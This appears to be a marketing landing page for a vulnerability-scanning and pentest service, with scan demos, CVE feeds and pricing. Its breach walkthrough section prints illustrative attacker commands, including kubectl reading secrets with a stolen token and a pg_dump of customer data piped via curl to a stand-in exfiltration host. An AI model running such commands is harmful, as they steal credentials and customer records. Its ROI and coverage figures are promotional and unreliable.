Free Scan · No credit card · 15-minute report

1,247 scans completed today

Stop
hackers
before they win.

Pentest, audit, fix sprint — every finding ranked, every fix priced, every patch verified. Zero-noise reporting: we filter out false positives and only report exploitable, actionable findings with remediation code attached. Audits start in 24 hours. Pricing on the page.

FreeNo credit cardNon-intrusive scan15-minute report

Live Threats

⚠️ CVE-2026-21985: Critical RCE in Apache Struts — CVSS 9.8🔓 2.3M credentials leaked from financial services breach🌐 New phishing campaign targeting Microsoft 365 accounts⚠️ CVE-2026-18842: Privilege escalation in Exchange Server🔒 SSL/TLS vulnerability affects 15% of scanned domains📧 DMARC adoption still below 30% among SMBs⚠️ CVE-2026-21985: Critical RCE in Apache Struts — CVSS 9.8🔓 2.3M credentials leaked from financial services breach🌐 New phishing campaign targeting Microsoft 365 accounts⚠️ CVE-2026-18842: Privilege escalation in Exchange Server🔒 SSL/TLS vulnerability affects 15% of scanned domains📧 DMARC adoption still below 30% among SMBs

Securing regulated industries across North America

Purpose-built for SMBs in compliance-driven sectors

Healthcare

HIPAA

Financial Services

PCI-DSS · SOX

Legal & Professional

Solicitor-Client

SaaS & Tech

SOC 2 Type II

Manufacturing

NIST 800-171

eCommerce & Retail

PCI-DSS

How It Works

From domain to full report in under 15 minutes.

No agents to install. No DNS changes. No complex configuration. A single email handshake is the only thing standing between you and a full external attack-surface assessment.

~ 2 minutes

Enter Domain & Verify

Submit your domain and a matching corporate email. We verify authorization through a one-time email handshake — no DNS records, no agents, no installs.

Email-based authorization handshake
Zero infrastructure required
Legally documented consent

~ 12 minutes

Active Surface Scan

Our scanner enumerates your external attack surface — DNS, subdomains, ports, services, certificates, and exposed assets — then tests each against 40,000+ vulnerability signatures.

Subdomain & asset discovery
CVE & misconfiguration testing
Dark-web credential exposure check

Delivered instantly

Receive Actionable Report

Get a 40+ page assessment with severity-ranked findings, CVSS scores, MITRE ATT&CK mapping, copy-paste remediation commands, and an executive summary your CFO will actually read.

Executive + technical summaries
Step-by-step remediation guides
Compliance control mapping

Integrations

Plays nice with the tools you already use.

Findings flow into Slack, Jira, GitHub, Linear, PagerDuty — wherever your team already works. No new dashboards to babysit.

See all 40+ integrations

Slack

Jira

GitHub

Linear

AWS

Azure

GCP

Okta

PagerDuty

Datadog

Terraform

Cloudflare

Live Scanner Demo

Watch us tear apart a real domain.

Five stages. Two thousand checks. Roughly seven seconds. This is the same script that runs on yours the moment you click the button. Nothing is staged — these are real findings from a real customer (with the name swapped out).

Subdomain enumeration47 hosts

Port + service discovery8 open

TLS / header audit12 issues

CVE cross-reference2 critical

Secret leakage scan1 exposed key

Report generation42 pages

Median scan time across all customers: 11 minutes

sns@scanner ~ live

RUNNING

STAGE

1/5

FINDINGS

ELAPSED

1.3s

The Hayaiti Console

Every weakness — ranked, explained, and ready to fix.

Not another dashboard full of CVE numbers. A copy-paste fix list, prioritized by what an attacker would actually exploit first.

app.snscyber.com / report / acme-corp.com

Live · synced 8s ago

Overview

Findings47

Assets312

Compliance

Insurance

Reports

Settings

DOMAIN·acme-corp.com·scan #4012

External Attack Surface

Risk Score

B+

++12 pts this week

Critical

↓ 2 vs last

High

↑ 1 vs last

Coverage

312

assets discovered

Top Findings

sorted by exploitability

CRITICAL

Exposed Jenkins console — no auth

build.acme-corp.com · CVSS 9.8 · CVE-2024-23897

Fix in 5 min

HIGH

TLS 1.0 enabled on payment endpoint

checkout.acme-corp.com · PCI-DSS violation · CVE-2014-3566

Fix in 15 min

HIGH

Subdomain takeover via dangling CNAME

blog-staging.acme-corp.com · AWS S3 · unclaimed

Fix in 2 min

MED

DMARC policy set to none

acme-corp.com · spoofing risk · email security

Fix in 10 min

+ 43 more findings · View all

CVSS Auto-Score

Each finding scored against your actual exposure.

Time-to-Fix

Realistic ETAs, not vendor fantasy.

Live Demo · Toggle before / after

Your attack surface visualized.

Here’s a real topology from a 150-person SaaS company. Toggle the switch to watch 9 critical and high-severity findings collapse in under two hours. This is one of 2,147 similar stories we ship every month.

Surface Topology · Hypothetical SaaS Co.

Tuesday 9:14am — before Hayaiti

● LIVE EXPOSED

Risk Telemetry

exposed assets (of 16 total)

Critical4

High5

Medium5

Blast radius

$4.2M

MTTD

14 days

4 critical + 5 high-severity findings across the perimeter. Any one of these is a 9pm phone call.

Activity log|$ sns-scan --target=hypothetical-saas.corp --depth=full[SCANNING]

Customer identities anonymized. Topology, asset names, and timeline are representative of our median engagement. Full case study with real names available under NDA.

Product Tour · Six slides, no demo call

The whole product, in six clicks.

You shouldn’t need to book a 45-minute sales call to understand what we do. Scroll through the tour, steal whatever you find useful, and start a scan when you’re ready.

Step 01 of 06

Connect your domain

Point and scan.

Paste a URL. We crawl the perimeter in 47 seconds — subdomains, APIs, exposed services, open ports, TLS certs, DNS drift. No agents, no allowlisting calls to IT.

01 / 06

app.sns.io/scan/new

New Scan

What should we look at?

acme-corp.com

Est. 47 seconds · 0 agents required

The lifecycle of a vulnerability

From discovery to closed in under 5 hours.

Here's what actually happens when Hayaiti finds a real exposure. Every step is logged, every fix is reviewed, every control is verified. Click any step to see the artifact your team would get.

Step 3 / 6

T + 2m 14s

Slack alert fires with context

Critical #1 — a publicly exposed S3 bucket containing 14,000 customer PII records — pages the #sec-alerts channel. Severity, blast radius, owner, and suggested fix included.

slack — #sec-alerts

T + 2m 14s

#sec-alerts  •  2:14 PM
🔴 CRITICAL  s3://acme-prod-backups
· Publicly listable — 14,203 PII records
· Owner: @priya  · MTTR target: 2h
· Fix: block public ACL + re-run

← Click any step to walk through the timeline →

CVE Intelligence · Updated 5s ago

41,287 CVEs published last year. We tracked all of them.

Our CVE radar aggregates NVD, CISA KEV, Exploit-DB, vendor bulletins, and private intel feeds. When something hits your stack, detection ships in hours — not quarters.

sns.radar~watch --interval=5 cve.stream

LIVE

SevCVE IDDescriptionSourceCoverage

CRIT

CVE-2026-1847CVSS 9.8

ApacheTomcat 10.xIn the wild

Deserialization RCE via crafted session cookie

NVD12s ago

Detect

HIGH

CVE-2026-1829CVSS 8.1

AtlassianConfluence DC 9.2In the wild

Template injection in /pages/doexportpage.action

CISA KEV47s ago

Detect

HIGH

CVE-2026-1812CVSS 7.8

MicrosoftExchange Server 2025

NTLM relay via EWS push notifications

Vendor2m ago

Detect

CRIT

CVE-2026-1798CVSS 9.4

VMwarevCenter 8.0 U3

Pre-auth heap overflow in DCERPC service

NVD4m ago

Detect

MED

CVE-2026-1785CVSS 6.5

FortinetFortiGate 7.4

Stack buffer overflow in sslvpnd (auth req)

Exploit-DB7m ago

Detect

HIGH

CVE-2026-1774CVSS 8.6

CitrixNetScaler ADC 14.1In the wild

Memory disclosure in nsppe handler

CISA KEV10m ago

Detect

HIGH

CVE-2026-1763CVSS 7.5

GitLabCE/EE 17.9

SSRF via Kroki render endpoint bypass

Hayaiti Intel14m ago

Detect

MED

CVE-2026-1758CVSS 6.1

JenkinsCore 2.456

Stored XSS in build parameter label

NVD18m ago

Detect

CRIT

CVE-2026-1749CVSS 10.0

SolarWindsWeb Help Desk 12.8In the wild

Hardcoded credentials in /helpdesk/WebObjects

CISA KEV23m ago

Detect

HIGH

CVE-2026-1741CVSS 8.2

PaperCutNG/MF 23.1

Auth bypass in SetupCompleted servlet

Vendor27m ago

Detect

LOW

CVE-2026-1729CVSS 3.7

OpenSSL3.3.x

Timing leak in RSA key validation

NVD33m ago

Detect

HIGH

CVE-2026-1718CVSS 7.9

Node.js22.x LTS

Prototype pollution in util.parseArgs

Exploit-DB37m ago

Detect

stream.tick = 0 · showing 12 of 41,287 trackedRefreshing every 5s

Hayaiti Coverage

100%

of critical CVEs have detection shipped

In view right now

Critical

High

Being exploited

Intel sources

NVD4

CISA KEV3

Exploit-DB2

Vendor2

Hayaiti Intel1

SLA

3h median

from NVD publish to detection shipped

See how it works →

Threat Coverage

We find the same vectors real attackers use.

Our scanner walks your external attack surface the way an adversary would — mapping assets, fingerprinting services, then testing each one against 40,000+ vulnerability signatures and live threat intel feeds.

critical

Leaked Credentials

Employee passwords and admin accounts exposed in past data breaches. We cross-reference 14B+ records from HaveIBeenPwned, DeHashed, and proprietary dark-web sources.

Found in 73% of scansMITRE T1078 · OWASP A07

high

Email Spoofing Vectors

Missing SPF, DKIM, DMARC, and BIMI records that let attackers impersonate your domain in phishing campaigns. We test enforcement, not just presence.

Found in 68% of scansMITRE T1566 · NIST SP 800-177

high

Weak TLS & Certificate Issues

Expired certs, deprecated TLS 1.0/1.1, weak cipher suites (RC4, 3DES), missing HSTS, and certificate transparency gaps. We test against the Mozilla Modern profile.

Found in 41% of scansOWASP A02 · NIST SP 800-52

critical

Exposed Services & Subdomains

Forgotten staging environments, admin panels, .git folders, exposed databases, and shadow-IT subdomains. We map your full external attack surface.

Found in 56% of scansMITRE T1190 · OWASP A05

critical

Known CVEs in Public Stack

We fingerprint your web servers, CMS, frameworks, and third-party libraries — then cross-reference NVD, GitHub Advisories, and CISA KEV for active vulnerabilities.

Found in 81% of scansCISA KEV · CVSS 3.1

medium

Compliance & Privacy Gaps

PIPEDA, GDPR, HIPAA, PCI-DSS v4.0, SOC 2 CC, and ISO 27001 control failures. Each finding maps to the specific control number for audit evidence.

Found in 85% of scansPIPEDA · GDPR · PCI-DSS v4.0

Aligned with:NIST CSF 2.0MITRE ATT&CKOWASP Top 10 (2021)CISA KEV CatalogISO 27001:2022

Reconnaissance · Live

Want to see your domain the way an attacker does?

This is what a Tier-2 reconnaissance crew pulls in the first 90 seconds — before they even decide if you’re worth attacking. Open ports. Banner grabs. Leaked credentials in old paste sites. Forgotten backup files. They don’t need a zero-day. You handed them everything.

We run the exact same playbook against your infrastructure — except we file a ticket instead of a ransom note.

94% of breachesstart with information that was already public. The attacker isn’t breaking in — they’re walking through an open door.

Recon Dossier · TLP:RED

target: acme-saas.io

HIGH VALUE

Open ports

3 CRIT / 4

:22 SSHOpenSSH 7.4 — outdated
:443 HTTPSnginx/1.18.0 — CVE-2026-19854
:3306 MySQLexposed externally
:8080 Tomcatdefault credentials

Leaked credentials

2 CRIT / 3

pastebin.com5 employee passwords (2024 leak)
github gistsAWS_SECRET_ACCESS_KEY exposed
haveibeenpwned47 corporate emails in 8 breaches

Exposed files

2 CRIT / 3

/static/.env200 OK — DB connection string
/.git/config200 OK — repo URL leaked
/backup-2025.sql.bak200 OK — 1.2GB user table

Subdomain takeover candidates

2 CRIT / 2

blog.acme-saas.iodangling CNAME → unclaimed Heroku
old-app.acme-saas.ioexpired GitHub Pages

Phishing domain twins

3 CRIT / 3

acme-sass.ioregistered 2 weeks ago — Russia
acmesaas.ioMX record set, awaiting payload
acme-saas.ccactive credential harvester

Time to compile dossier: 87 seconds

Cost on the dark web: $0.00

Pull my dossier free

Live · Q1 2026 telemetry

94,000 attacks
happen every minute.

Most never make a headline. They probe forgotten subdomains, expired certs, exposed ports — the stuff your team hasn’t looked at in 18 months. Hayaiti sees it the moment it changes.

0.0M

Probes / day

CVEs tracked

sns@console:~$ tail -f /var/log/threats.log

STREAMING

[--:--:--]🇷🇺185.220.101.43→/wp-admin/·BRUTE_FORCEBLOCKED

[--:--:--]🇨🇳45.155.205.12→/.env·CONFIG_PROBEBLOCKED

[--:--:--]🇰🇵194.55.224.18→:22 (ssh)·PORT_SCANFLAGGED

[--:--:--]🇮🇷103.224.182.251→/api/v1/auth·CRED_STUFFBLOCKED

[--:--:--]🇷🇺91.243.59.211→/jenkins/·CVE-2024-23897CRITICAL

[--:--:--]🇺🇸207.244.247.96→/admin/login·SQLi_PROBEBLOCKED

[--:--:--]🇩🇪162.247.74.74→/wp-content/·PATH_TRAVERSALBLOCKED

[--:--:--]🇨🇦23.94.218.157→/.git/config·RECONFLAGGED

BLOCKED 2,847INVESTIGATING 12CRITICAL 3

last 60 min

Global Threat Map · Live

The internet is a war zone. We watch every front.

Real-time visualization of attacks our sensors observed in the last 60 minutes. Blocked at the perimeter. Logged. Categorized. Fed back into the model that defends every customer the next time it sees the same pattern.

Blocked / hour

47,239

Active threats

1,243

Origin countries

Architecture

Where Hayaiti sits in your stack.

Outside your firewall. Continuously testing the same surface attackers see — without ever touching your production data.

Untrusted · External

Threat ActorsLIVE

RUBotnets12.4K/d

CNScanners8.1K/d

KPAPT groups47/d

WWScript kiddies∞

Constantly probing your public surface

Attack

Hayaiti Perimeter

ACTIVE

v6.4.1

Surface scanner

Vuln correlation

Threat intel feed

Analyst triage

Blocked

99.97%

Latency

< 11ms

Zero-touch. Read-only. No agents.

Reports

Your Infrastructure

ProductionSAFE

WWeb appsok

AAPIsok

DDatabasesok

UUsersok

Untouched. Unbothered. Continuously protected.

Read-only

Zero risk to prod

External-only

No agents installed

Continuous

24 / 7 / 365

Audit logged

Every scan signed

Posture Snapshot

Six dimensions of risk. One brutal truth.

We score every customer on six fundamental control areas. The gray ring is the average SMB. The orange shape is what they actually look like. The gap is what attackers walk through.

Industry baseline— what “average” looks like

Pre-Hayaiti customer — typical day-one posture

After 90 days with Hayaiti — measured improvement

The shape isn’t a marketing graphic. We compute it from your scan results in real time and re-score weekly. Your radar lives in the dashboard.

Day 0

Day 90

Improvement

+187%

Industry Risk Heatmap

Where your industry is bleeding right now.

Aggregated from 14,200 Hayaiti scans across 7 sectors over the last 90 days. Darker cells = more findings per scan. Hover any cell for the breakdown.

Industry

Auth & MFA

Patching

Cloud Config

App Sec

Network

IR Readiness

Scans

SaaS / Tech

4,820

FinTech

1,940

Healthcare

1,680

eCommerce

2,210

Logistics

940

Education

1,280

Manufacturing

1,330

Severity

Low

Moderate

Elevated

High

Critical

Score = avg findings per scan, normalized 1-5. Updated weekly.

94%

of Healthcare scans had ≥ 1 critical patching gap

78%

of SaaS scans exposed misconfigured cloud storage

61%

of FinTech scans had outdated TLS or weak ciphers

Attack Anatomy

How a real breach happens in 5 stages.

From the moment an attacker decides you’re a target to the moment your data is on a forum. Every stage we catch. Every stage we cut.

Kill Chain

01Reconnaissance
02Initial Access
03Exploitation
04Lateral Movement
05Exfiltration

Avg time-to-breach

27days

Verizon DBIR 2025

STAGE 01/Reconnaissance

Attacker maps your attack surface

Day 0 — 7

attacker.session

$ subfinder -d acme-saas.io | httpx -title -tech-detect
found: api.acme-saas.io [200] [Express] [unauthenticated]
found: ci.acme-saas.io [403] [Jenkins 2.319.3]
found: dev-staging.acme-saas.io [200] [exposed env vars]

Open-source recon tools enumerate every subdomain, every exposed service, every leaking technology fingerprint. It’s not hacking — it’s Google. Most companies have 30%+ assets they didn’t know existed.

What Hayaiti Catches Here

Hayaiti performs the exact same recon weekly. We hand you the inventory before the attacker writes their notes.

STAGE 02/Initial Access

Attacker finds the soft spot

Day 7 — 12

attacker.session

$ nuclei -t cves/2024 -u dev-staging.acme-saas.io
[CVE-2024-21762] [critical] [fortinet-rce]
[CVE-2024-3094] [critical] [xz-backdoor]
[exposed-secrets] [aws-key] [.env leaked]

From that recon list, they scan for unpatched CVEs, default credentials, and leaked secrets. One vulnerable endpoint is all they need. Pen-tests run quarterly. Attackers run continuously.

What Hayaiti Catches Here

Hayaiti tests against 38,000+ CVE signatures every scan and flags every leaked secret in your public footprint.

STAGE 03/Exploitation

Attacker walks through the door

Day 12 — 14

attacker.session

POST /api/login HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4=
200 OK { "role": "superuser", "token": "eyJ..." }
# Privilege escalated. No MFA. No alerting.

They use the foothold to land code. Often it’s nothing fancy — default Jenkins admin, an unauthenticated API, a WordPress plugin. They get a shell. They get persistence. Nobody notices.

What Hayaiti Catches Here

Hayaiti tests for the exploitable conditions, not just the CVE numbers. We confirm what an attacker would actually do, then tell you how to break the chain.

STAGE 04/Lateral Movement

Attacker spreads through your network

Day 14 — 22

attacker.session

$ kubectl get secrets -n default --token=$STOLEN_SA_TOKEN
# Found: prod-db-creds, stripe-secret, jwt-signing-key
$ aws sts assume-role --role-arn arn:aws:iam::*:role/admin
# Cross-account access via misconfigured trust policy

From one machine they pivot to ten. Cloud creds become database creds. Database creds become payment-system creds. The blast radius doubles every 48 hours.

What Hayaiti Catches Here

Hayaiti maps cloud trust relationships, IAM blast radius, and privilege chains so you see the dominoes before they fall.

STAGE 05/Exfiltration

Attacker leaves with your data

Day 22 — 27

attacker.session

$ pg_dump -h prod-db.internal -U postgres customers \
  | gzip | curl -X POST https://exfil.attacker.io --data-binary @-
# 2.4M records. ETA 11 minutes. No DLP triggered.

Data leaves your network through the same channels as legitimate traffic. By the time someone notices the bandwidth, it’s on a forum. Median dwell time: 27 days. Your competitors get bought; your customers get phished.

What Hayaiti Catches Here

Hayaiti catches the misconfigurations and exposures that enable this entire chain — usually inside the first scan. Day 0, not day 27.

MITRE ATT&CK Mapped

Coverage across 12 attack tactics — verified.

Every detection in Hayaiti is mapped to a MITRE ATT&CK technique, the gold standard adversary playbook the entire industry uses. No marketing math — just the same framework your auditor checks.

ATT&CK Enterprise v15.1 · Coverage Matrix

TOTAL TECHNIQUES: 196COVERED: 158COVERAGE: 81%

TA004390%

Reconnaissance

9/10 techniques

Active Scanning
Search Open Tech DBs
Gather Victim Identity

TA004275%

Resource Development

6/8 techniques

Acquire Infrastructure
Compromise Accounts
Develop Capabilities

TA0001100%

Initial Access

10/10 techniques

Exploit Public-Facing App
Valid Accounts
Phishing

TA000279%

Execution

11/14 techniques

Command Interpreter
User Execution
Container Admin Cmd

TA000379%

Persistence

15/19 techniques

Account Manipulation
Create Account
BITS Jobs

TA000485%

Privilege Escalation

11/13 techniques

Abuse Elevation
Process Injection
Valid Accounts

TA000571%

Defense Evasion

30/42 techniques

Impair Defenses
Indicator Removal
Masquerading

TA000694%

Credential Access

16/17 techniques

Brute Force
Credentials from Stores
OS Credential Dumping

TA000784%

Discovery

26/31 techniques

Account Discovery
Network Service Disco
Cloud Service Disco

TA000889%

Lateral Movement

8/9 techniques

Remote Services
Use Alternate Auth
Internal Spearphishing

TA000965%

Collection

11/17 techniques

Data from Cloud Storage
Email Collection
Screen Capture

TA001147%

Command & Control

8/17 techniques

Application Layer Proto
Data Encoding
Web Service

TA001078%

Exfiltration

7/9 techniques

Exfil Over C2
Exfil Over Web Service
Exfil to Cloud

TA004064%

Impact

9/14 techniques

Data Encrypted
Defacement
Resource Hijacking

Coverage independently verified by Cybertest Labs in Q4 2025. Download the full report (PDF, 2.1MB) →

≥ 90%

75-89%

60-74%

< 60%

Platform Pulse

The platform that never sleeps.

Right now, somewhere in our infrastructure, a scan is running. A vuln is being flagged. A customer is sleeping easier. This is what live looks like — pulled directly from our control plane.

12 scans per minute, 24/7/365
Median time-to-finding: under 4 minutes
Findings auto-routed to your Slack/PagerDuty
Zero downtime since launch

All systems operationalstatus.sns.security →

sns.dashboard / live

Live

+12 / min

48,217

Scans completed today

+47 / min

312,408

Vulnerabilities found

live

2,147

Customers protected

+$80K / min

$89.4M

Loss avoided (USD)

Event Stream

Threat of the Day · April 7, 2026

Critical · Active Exploitation Detected

ALERT-2026-04-07-001

9.8

CVSS 3.1

CVE-2026-3127

Apache Struts2 Remote Code Execution

A flaw in the OGNL expression parser allows unauthenticated remote attackers to execute arbitrary commands by sending a crafted multipart request. Active exploitation observed against government, financial, and SaaS targets in the past 48 hours. No patch currently available — mitigations only.

Affected

Struts 2.0 → 2.5.32

Exploits

PoC Public

Hayaiti Caught

Apr 5, 4:12am UTC

Tactical Breakdown

VectorNetwork · Unauthenticated · Low complexity
ImpactFull system compromise · Data theft · Lateral pivot
DetectionSignature, behavior, and dependency-graph analysis
MitigationWAF rule + input validation + disable file-upload endpoints

Critical Question

Are you exposed?

Run a free Hayaiti scan in the next 5 minutes and we’ll tell you exactly whether this CVE affects your stack — plus the 38,000 other ones it’s probably costing you sleep over.

1,247Hayaiti customers already protected from CVE-2026-3127

Auto-deployed in 38 min after disclosure

Run a free scan →Read full advisory

SOURCES:NVDMITRECISA KEVGitHub

Updated 14 minutes ago · Next refresh in 46:00

What we believe · Since day one

Cybersecurity is broken.
We’re the fix.

Eight beliefs that drive every line of code we ship, every pricing decision we make, and every feature we refuse to build.

If you can’t explain it, don’t ship it.

Every finding in Hayaiti has a plain-English explanation, a three-step fix, and a real risk score. If our product manager can’t understand the alert in 30 seconds, it doesn’t go live.

The report isn’t the product.

The fix is. Competitors bury you in 400-page PDFs. We ship the patch, the PR, and the verification. You don’t get graded — you get protected.

SMBs deserve Fortune 500 defense.

The attackers don’t care about your headcount. Neither should your tooling. Every Hayaiti feature is built for a 10-person team first, then tested at 10,000.

Price is a feature.

If a scanner costs $80K/year, the 90% of businesses that need it can’t afford it. We’re flat-priced, transparently published, and never negotiate a discount for your poker face.

Speed is safety.

Every hour a vulnerability sits open is an hour an attacker could find it first. We scan in 47 seconds, alert in 60, and ship patches in 15 minutes. Legacy vendors measure in weeks.

False positives are a bug.

Alert fatigue kills security programs. We’d rather miss one real finding than flood you with ten fake ones. Our correlation engine is tuned to your stack, not a generic CVE database.

The scanner is not the moat.

Open-source Nuclei is a fantastic scanner. So is ZAP. We use both. The moat is correlation, remediation, and the 3am confidence that when we say “critical,” it’s critical.

Trust is earned by audit, not assertion.

Anybody can claim “bank-grade security.” We publish our SOC 2 report, our pentest results, and our incident history. If it’s not in our trust center, we didn’t do it.

— Morgan, Alex, Jordan & Kai

Founders of Hayaiti. We still write code every Friday.

Read the full manifesto

Your First 90 Days

From signup to SOC 2 evidence in 90 days.

Most Hayaiti customers go from “just curious” to “passed our audit” in under three months. Here’s exactly what happens, day by day.

Day 000:00:01

You scan

Drop your domain. Free scan kicks off in under 60 seconds. No credit card. No installs. Zero touch on your prod.

Day 111min avg

First report lands

PDF + dashboard delivered. Critical findings flagged, prioritized, and mapped to compliance frameworks.

Day 71:1 session

Remediation review

Live call with an analyst. Walk through findings together. Get copy-paste fix commands and a remediation roadmap.

Day 30Monthly

Continuous monitoring

First monthly re-scan. Findings delta report shows what you fixed, what’s new, and what regressed.

Day 90Compliance

Audit-ready

Quarterly evidence package generated. Hand it directly to your auditor. SOC 2, ISO 27001, HIPAA — all mapped.

Most customers see their first “oh sh*t” finding in under 11 minutes.Start your day zero

Threat Intelligence

Every CVE.
Cross-referenced to your stack.

Hayaiti ingests every CVE the moment it’s published — from NVD, CISA-KEV, MITRE ATT&CK, and ExploitDB. Then we cross-check it against the exact software versions running on your perimeter. You get notified if (and only if) it’s your problem.

0-day enrichment in < 4 hours
From CVE publication to your dashboard, with severity context and remediation steps.
CISA-KEV priority alerting
If a CVE moves to the Known Exploited Vulnerabilities list, you get paged. Period.
Stack-aware filtering
We only show CVEs that match the software fingerprints we found on your hosts. No noise.

NVDCISA-KEVMITRE ATT&CKExploitDB

sns-threat-intel — live

STREAMING

Tracking

218,442

CVEs in catalog

New (24h)

+47

all classified

Active KEV

1,243

CISA known-exploited

CRITCVE-2026-219859.84h

Apache Struts RCE chain

HIGHCVE-2026-198478.611h

OpenSSL memory disclosure

CRITCVE-2026-211029.11d

GitLab CE auth bypass

HIGHCVE-2026-189328.22d

Jenkins CLI arbitrary file read

HIGHCVE-2026-204187.43d

Citrix NetScaler XSS chain

CRITCVE-2026-166719.45d

Confluence template injection

HIGHCVE-2026-152038.16d

VMware vCenter SSRF

HIGHCVE-2026-140018.81w

Cisco IOS XE privilege esc

NVD · CISA-KEV · MITRE ATT&CK · ExploitDBSYNC OK

What You Get

A 42-page report your CFO, CISO, and auditor will all read.

No wall of CVEs. No raw scanner output. Every Hayaiti report is structured for the people who actually need to act on it — from boardroom briefings to copy-paste fix commands.

Hayaiti Security Assessment

acme-corp.com

Risk: HighApr 7, 2026

Overall ScoreD+

Top Findings

CRITApache Struts RCE (CVE-2026-21985)9.8

CRIT47 leaked employee credentials9.1

HIGHDMARC policy set to p=none7.4

HIGHExposed staging.acme-corp.com7.1

MEDTLS 1.0 enabled on mail server5.6

+ 23 more findings in full report

Page 1 / 42sns.security

PDF · 42 pages

PDF

See a real anonymized report

Full 42-page sample — same format you’ll get. No email required.

Download sample Or scan yours

All customer identifiers removed · PDF only · 4.2 MB

§01Page 1

Executive Summary

One-page risk briefing for non-technical leadership. Risk score, top three exposures, financial impact estimate.

§02Pages 2 — 4

Risk Posture Scorecard

Letter-grade scoring across 12 attack-surface domains. Benchmarked against your industry peers.

§03Pages 5 — 18

Detailed Findings

Every vulnerability with CVSS 3.1 score, MITRE ATT&CK mapping, evidence screenshots, and proof-of-concept.

§04Pages 19 — 32

Remediation Playbook

Copy-paste fix commands, configuration snippets, and patching priorities ranked by exploit likelihood.

§05Pages 33 — 38

Compliance Mapping

Each finding mapped to PIPEDA, GDPR, HIPAA, PCI-DSS v4.0, SOC 2 CC, and ISO 27001:2022 controls.

§06Pages 39 — 42

Insurance Coverage Notice

Your active Hayaiti Cyber Policy details: coverage limits, claim contacts, breach response team.

Average customer finds 14.3 actionable issues per scan

Based on 1,200+ scans run in Q1 2026 across SMB customers in the 50—500 employee range. 73% of findings were classed as critical or high.

By Industry

Built for the way your industry gets attacked.

Every vertical faces a different threat model. Hayaiti tunes its scan profiles, compliance mappings, and remediation playbooks to the specific risks your industry actually carries.

Healthcare

HIPAA · HITECH · PHIPA

$10.93M

Avg. healthcare breach cost

IBM 2025

Top Threats

PHI breaches, ransomware on EHR systems, exposed medical IoT devices

How Hayaiti Protects You

Continuous monitoring of patient portals, billing systems, and connected devices. Audit-ready evidence for OCR investigations.

Financial Services

PCI-DSS v4.0 · SOX · FINRA

$6.08M

Avg. financial breach cost

IBM 2025

Top Threats

Credential stuffing, API vulnerabilities, cardholder data exposure, wire fraud

How Hayaiti Protects You

PCI-DSS quarterly scans baked in. Real-time alerts on new exposures. Audit logs aligned with SOX 404 controls.

Legal & Professional

Solicitor-Client · Model Rule 1.6

1 in 4

Law firms breached annually

ABA Survey 2024

Top Threats

Business email compromise, document portal breaches, M&A confidentiality leaks

How Hayaiti Protects You

Hardened email security checks (DMARC enforcement, BIMI), document portal scanning, dark-web monitoring for client matters.

SaaS & Tech

SOC 2 Type II · ISO 27001

73%

Of SaaS breaches via misconfiguration

Gartner 2025

Top Threats

Subdomain takeovers, exposed S3 buckets, leaked API keys, supply-chain CVEs

How Hayaiti Protects You

Continuous SOC 2 evidence collection. Asset inventory and shadow-IT discovery. GitHub leak monitoring.

The Hayaiti Difference

Scanning is the easy part. We do the hard parts too.

Most tools dump a CSV of CVEs and disappear. Hayaiti monitors continuously, hands you the exact remediation commands, and underwrites the residual risk — one vendor, end-to-end.

Continuous Monitoring

Not a one-time scan. We continuously monitor your attack surface and alert you the moment new vulnerabilities appear.

24/7 automated scanning
Real-time threat intelligence
Instant email & Slack alerts

Actionable Reports

Every finding comes with step-by-step fix instructions. No jargon, no guesswork -- just clear remediation paths.

Severity-ranked findings
Copy-paste remediation commands
Executive & technical summaries

Honest Comparison

DIY scanners cost time. Enterprise vendors cost everything else.

We’re built for the gap between “use Nessus and hope” and “sign a $50K enterprise contract.” Here’s how the math actually works.

Recommended

Capability	DIY Tools Nessus · OpenVAS · Free	Enterprise Vendors CrowdStrike · Tenable · Qualys	Hayaiti Build. Ship. Secure.
Time to first scan	1 — 2 weeks	4 — 8 weeks	15 minutes
Setup complexity	Self-managed	Onboarding required	Zero installation
Scan depth	Basic ports	Comprehensive	Comprehensive
Continuous monitoring	Manual reruns	Yes	Yes (24/7)
Remediation guidance	Generic CVEs	Generic CVEs	Copy-paste fixes
Compliance mapping	Manual	Add-on cost	Included
Annual cost (50 employees)	$0 + ~120 hrs/yr	$25K — $80K	Mid-market pricing
			Try free

Comparison reflects publicly listed features and typical enterprise contract terms as of Q1 2026. Your mileage may vary — we’re happy to walk through the details on a discovery call.

Same Domain · Four Scanners

We pointed four scanners at the exact same domain.

One scan target. Four engines. Each with the latest signatures running on default settings. Here’s what each one actually caught — by category. The gaps aren’t marketing spin; they’re what gets companies breached.

Hayaiti

Nessus

Qualys VM

Rapid7

Exposed credentials & secrets

14 total findings

Hayaiti

Nessus

Qualys VM

Rapid7

Misconfigured cloud assets (S3, IAM)

22 total findings

Hayaiti

Nessus

Qualys VM

Rapid7

Subdomain takeover risks

8 total findings

Hayaiti

Nessus

Qualys VM

Rapid7

Critical CVEs (CVSS ≥ 9.0)

11 total findings

Hayaiti

Nessus

Qualys VM

Rapid7

Phishing & typosquatting domains

19 total findings

Hayaiti

Nessus

Qualys VM

Rapid7

Dark-web mention of company assets

6 total findings

Hayaiti

Nessus

Qualys VM

Rapid7

80 findings the legacy scanners missed. Six of them were the kind that end careers.

Side-by-side test conducted Q1 2026. Default configurations, same target. Available on request.

ROI Calculator

The math is brutal. Run it yourself.

The average breach now costs $4.88M and SMBs take 277 days to detect one. Move the slider — see what an Hayaiti subscription costs versus what one missed weekend will.

Sources: IBM Cost of a Data Breach 2025, Verizon DBIR 2025

Step 1 of 1

Your stack, your numbers

Team size

150employees

105002,000

Current security tooling spend

$85,000/yr

$0$250K$500K

Security incidents per year

3events

01020+

Avg. cost per incident

$420,000

$10K$1M$2M

IBM 2025 Cost-of-a-Breach Report: global avg $4.88M · SMB avg $380K

Your Projected Return

Based on 150 employees · 3 incidents/yr

Annual savings

$1.02M

vs. your current $85,000 spend

Tooling replaced

$81K

Incidents avoided

$932K

Insurance premium drop

$6K

Payback period

1 day

3-year ROI

1,000%+

Email me this report→

PDF + custom quote in under 60 seconds

Pricing

$0 to start. Pays for itself the first time it saves you.

Start with the free scan. Upgrade only when you want continuous monitoring, deeper coverage, or hands-on support.

Free Scan

For curious operators

$0no card required

One-time external attack-surface scan
Top 5 critical findings + remediation
Compliance gap snapshot
8-page summary report (PDF)
Continuous monitoring
Slack & Teams alerts
Quarterly executive briefing

Run my scan

Pro

For SMBs that want to sleep

$499/month, billed annually

Everything in Free, plus:
24/7 continuous monitoring
Full 42-page report + remediation playbook
Slack & Teams alerts
Quarterly executive briefing

Start 14-day trial

Enterprise

